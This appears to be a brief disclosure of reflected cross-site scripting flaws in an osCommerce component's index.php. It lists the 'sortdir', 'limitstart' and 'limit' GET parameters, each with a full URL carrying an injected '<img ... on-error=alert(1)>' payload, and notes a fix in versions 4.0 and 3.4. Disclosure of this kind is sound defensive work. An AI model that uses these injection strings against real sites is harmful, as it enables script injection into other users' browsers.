Path: /en/index.php
GET parameter 'sortdir' is vulnerable to XSS
index.php?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=descgt5po<img src=a on-error=alert(1)>vh217
GET parameter 'limitstart' is vulnerable to XSS
index.php?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=desc&limitstart=0lmefx<img src=a on-error=alert(1)>fe7s7
GET parameter 'limit' is vulnerable to XSS
index.php?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=desc&limitstart=0&limit=25oj1c5<img src=a on-error=alert(1)>tquly
This issue has been resolved in Version 4.0 and retroactively in 3.4. Have you found anything else? Please let us know.
